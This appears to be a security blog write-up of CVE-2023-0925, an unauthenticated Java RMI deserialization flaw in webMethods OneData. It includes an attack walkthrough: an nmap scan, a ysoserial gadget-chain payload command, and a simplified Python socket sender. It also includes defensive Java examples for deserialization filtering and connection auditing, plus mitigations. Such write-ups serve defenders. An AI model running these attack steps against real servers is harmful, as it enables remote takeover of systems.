In early 2023, a critical vulnerability—CVE-2023-0925—was discovered in webMethods OneData (version 10.11), a popular data management platform by Software AG. The vulnerability centers around an exposed Java RMI registry running on Azul Zulu Java 11..15 embedded within the product, which listens on TCP port 2099 by default. This exposure lets unauthenticated attackers on the network execute arbitrary code as SYSTEM (on Windows), potentially leading to a full remote compromise of the affected system.
Vulnerable Ports:
- Java RMI registry: 2099/tcp (default)
The Vulnerability
webMethods OneData ships with a Java RMI setup. The RMI registry on port 2099 allows remote listings and interactions with RMI interfaces, which themselves are exposed on high TCP ports. Critically, these ports and the associated methods do not enforce authentication and accept serialized Java objects as user-supplied input.
An attacker with the ability to connect to these ports can use specially-crafted serialized Java objects (payloads) to exploit unsafe Java deserialization. Once the malicious serialized object is passed as a parameter to one of the OneData RMI methods and then deserialized by the application, arbitrary attacker-chosen code is executed immediately, with full privileges of the webMethods OneData service.
This deserialization bug belongs to a classic category of Java vulnerabilities and remains extremely dangerous when basic protections are not in place.
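As an added illustration (this is not code from the original write-up or from Software AG), the Java program below shows what one of those basic protections looks like: a JEP 290 deserialization filter (`java.io.ObjectInputFilter`, part of the Java 11 runtime that OneData 10.11 bundles) that allows only the types a service expects and rejects any other class before its deserialization logic can run. The class `SerialFilterDemo`, the `Record` type and the allow-list pattern are assumptions for the demo; `HashMap` simply stands in for an unexpected class.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;

/*
 * Added example, not part of webMethods OneData. Demonstrates a JEP 290
 * deserialization allow-list (java.io.ObjectInputFilter, Java 9+), i.e. the
 * "limit classes available for deserialization" hardening step.
 */
public class SerialFilterDemo {

    // Hypothetical DTO standing in for a type the RMI service legitimately accepts.
    public static final class Record implements Serializable {
        private static final long serialVersionUID = 1L;
        public final String name;
        public Record(String name) { this.name = name; }
    }

    // Allow-list pattern: our DTO plus java.lang (String etc.); the trailing "!*"
    // rejects every other class, which is where gadget-chain classes would fall.
    // The same pattern syntax is accepted JVM-wide via -Djdk.serialFilter=... and
    // by the RMI-specific sun.rmi.registry.registryFilter / sun.rmi.transport.dgc.dgcFilter
    // system properties.
    public static final String ALLOW_LIST = "SerialFilterDemo$Record;java.lang.*;!*";

    private static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(ALLOW_LIST);

    public static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Deserialize with the allow-list attached to this stream. The filter is
    // consulted for each class descriptor before the class is resolved, so a
    // rejected class never has its readObject/readResolve logic executed.
    public static Object deserializeFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    // true when the filter rejected the stream (InvalidClassException, "filter status: REJECTED"),
    // false when the object was accepted.
    public static boolean isRejected(byte[] data) throws IOException, ClassNotFoundException {
        try {
            deserializeFiltered(data);
            return false;
        } catch (InvalidClassException e) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] expected = serialize(new Record("customer-42"));
        byte[] unexpected = serialize(new HashMap<String, String>()); // stands in for an unknown type

        System.out.println("Record accepted:  " + !isRejected(expected));
        System.out.println("HashMap rejected: " + isRejected(unexpected));
    }
}
```

For RMI servers specifically, Java 9 and later also let a filter be attached when an object is exported, via `UnicastRemoteObject.exportObject(Remote, int, ObjectInputFilter)`, so the allow-list applies to every argument the remote methods receive rather than only to streams you open yourself.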
Step 1: Reconnaissance
First, the attacker scans the target for open ports, identifying 2099 (RMI registry) and the dynamically-assigned RMI interface port.
# Basic port scan example
nmap -p 2099,20000-65535 target.onedata.local
Step 2: Generate a Malicious Java Payload
Using a gadget chain from ysoserial (for instance, CommonsCollections1), the attacker creates a payload that, when deserialized, runs a chosen command on the server.
java -jar ysoserial.jar CommonsCollections1 'calc.exe' > payload.ser
*(This launches Calculator on Windows. Replace with relevant commands for actual implants.)*
Step 3: Send the Payload via RMI
There are several ways to trigger the RMI deserialization. The attacker can use a tool like marshalsec to directly interact with the exposed RMI service.
Example Python Code: Remote Invocation
*(Assuming knowledge of the target interface and method signature)*
import socket
# This is a simplified example. RMI protocol is binary and complex.
# In practice, tools like marshalsec or custom Java code would be used.
RMI_HOST = 'target.onedata.local'
RMI_PORT = 2099
PAYLOAD = open('payload.ser', 'rb').read()
s = socket.socket()
s.connect((RMI_HOST, RMI_PORT))
s.sendall(PAYLOAD)
s.close()
Note: Normally, you would use Java client tooling tailored for RMI. This is just to illustrate that the attack path is unfettered once you have network access.
Step 4: Get Code Execution
When the OneData RMI service receives and deserializes the object, the payload runs on the server with the service's privileges (typically SYSTEM on Windows).
Proof-of-Concept Tools
- ysoserial — Create Java gadget chains for RCE
- Nmap — Port scanning
- marshalsec — Exploiting Java deserialization and RMI
- Remote, unauthenticated attackers can *fully compromise the server*
- Code is executed with all privileges of the running service (often SYSTEM/Administrator)
1. Upgrade: If possible, update webMethods OneData to the latest version immediately.
2. Restrict Access: Use firewalls to block external access to ports 2099 and the dynamic RMI interface ports.
3. Monitor: Audit your network for any unexpected inbound traffic to those ports.
4. Harden RMI: If RMI must be exposed, use authentication (SSL/RMI security managers) and limit classes available for deserialization.
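The monitoring step above, as an added example that is not part of the original write-up: a small Java audit that reads connection records, keeps only TCP traffic to the OneData host, and flags connections to the RMI registry port (2099) or to the high port range the write-up scans (20000-65535) from any source not on the expected-client list. The key=value log format, the host address `10.0.5.10`, the allow-listed source `10.0.5.20` and the sample lines are all constructed for the demo.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/*
 * Added example, not from the original write-up. Audits inbound connection
 * records for traffic to the OneData RMI registry (2099/tcp) and to the high
 * TCP ports RMI uses for exported objects, flagging sources that are not on
 * the expected-client list. Log format, hosts and addresses are constructed.
 */
public class RmiExposureAudit {

    public static final int RMI_REGISTRY_PORT = 2099;
    // High-port range the write-up scans; RMI exported objects bind here by default.
    public static final int RMI_HIGH_PORT_MIN = 20000;
    public static final int RMI_HIGH_PORT_MAX = 65535;

    // Constructed key=value flow-log format (not a real vendor format).
    private static final Pattern LINE = Pattern.compile(
        "^(?<ts>\\S+)\\s+src=(?<src>[0-9.]+)\\s+dst=(?<dst>[0-9.]+)\\s+dport=(?<dport>\\d+)\\s+proto=(?<proto>\\w+)");

    public static final class Finding {
        public final String timestamp, source, reason;
        public final int port;
        Finding(String timestamp, String source, int port, String reason) {
            this.timestamp = timestamp; this.source = source; this.port = port; this.reason = reason;
        }
        @Override public String toString() {
            return timestamp + " " + source + " -> :" + port + " " + reason;
        }
    }

    // One finding per TCP connection to the OneData host's RMI ports from a non-allow-listed source.
    public static List<Finding> audit(List<String> lines, String onedataAddr, Set<String> allowedSources) {
        List<Finding> findings = new ArrayList<>();
        for (String line : lines) {
            Matcher m = LINE.matcher(line);
            if (!m.find()) continue;                                   // skip lines we cannot parse
            if (!"tcp".equalsIgnoreCase(m.group("proto"))) continue;   // RMI is TCP only
            if (!onedataAddr.equals(m.group("dst"))) continue;         // only traffic to the OneData host
            int port = Integer.parseInt(m.group("dport"));
            String src = m.group("src");
            if (allowedSources.contains(src)) continue;                // expected integration/admin hosts
            if (port == RMI_REGISTRY_PORT) {
                findings.add(new Finding(m.group("ts"), src, port, "RMI registry from unexpected source"));
            } else if (port >= RMI_HIGH_PORT_MIN && port <= RMI_HIGH_PORT_MAX) {
                findings.add(new Finding(m.group("ts"), src, port, "possible RMI object port from unexpected source"));
            }
        }
        return findings;
    }

    public static void main(String[] args) {
        // Constructed sample records: one allow-listed client, one unexpected source
        // touching the registry and then a high port, plus two lines that must not fire.
        List<String> sample = Arrays.asList(
            "2023-09-06T18:15:00Z src=10.0.5.20 dst=10.0.5.10 dport=2099 proto=tcp",
            "2023-09-06T18:15:07Z src=198.51.100.23 dst=10.0.5.10 dport=2099 proto=tcp",
            "2023-09-06T18:15:09Z src=198.51.100.23 dst=10.0.5.10 dport=41234 proto=tcp",
            "2023-09-06T18:15:12Z src=198.51.100.23 dst=10.0.5.10 dport=443 proto=tcp",
            "2023-09-06T18:15:15Z src=198.51.100.23 dst=10.0.5.11 dport=2099 proto=tcp"
        );
        for (Finding f : audit(sample, "10.0.5.10", Set.of("10.0.5.20"))) {
            System.out.println(f);
        }
    }
}
```

Running it prints two findings for `198.51.100.23` (the registry connection and the connection to port 41234) and nothing for the allow-listed host, the HTTPS connection, or the connection to a different destination. The high-port rule is deliberately broad; in practice, narrow `RMI_HIGH_PORT_MIN`/`MAX` to the ports the OneData JVM is actually listening on (for example from `netstat -ano` on the Windows host) to keep the audit free of unrelated services.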
References
- Original Advisory (Software AG security)
- NIST CVE Detail - CVE-2023-0925
- ysoserial (RCE payload generator)
- marshalsec (Java deserialization exploit tool)
- Java RMI Registry Exposed: The Serial Killer
Conclusion
*CVE-2023-0925* is a striking reminder that shipping software with exposed Java RMI and insecure deserialization is extremely hazardous. If you rely on webMethods OneData, patch immediately, restrict network access, and audit systems for signs of compromise. Attackers do not need credentials—just a remote connection and some basic Java tools. This issue can quickly underpin devastating attacks if left unaddressed.
Timeline
Published on: 09/06/2023 18:15:00 UTC
Last modified on: 09/14/2023 15:40:00 UTC